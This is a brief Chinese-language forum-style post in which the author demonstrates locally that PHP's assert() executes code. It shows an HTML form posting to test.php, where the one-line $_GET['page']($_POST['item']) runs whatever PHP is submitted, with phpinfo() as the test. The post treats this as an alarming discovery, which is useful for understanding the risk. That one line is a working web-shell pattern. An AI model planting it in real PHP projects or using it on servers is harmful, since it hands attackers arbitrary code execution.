assert也可以直接执行php代码。
现在在本机模拟了下。
建一个post.html
<form action = "test.php?page=assert" method = "post">
<input type = "text" name = "item" />
<input type = "submit" value = "运行" />
</form>
复制代码
复制代码
再建一个test.php
<?php $_GET[‘page’]($_POST[‘item’]); ?>
复制代码
复制代码
这个post.html在任何电脑上运行都可以,只要action的地址是那个test.php.
在输入框里输入: phpinfo(); 点击运行按钮,
尼玛 phpinfo就直接出来啦,太可怕了,这可以为所欲为了啊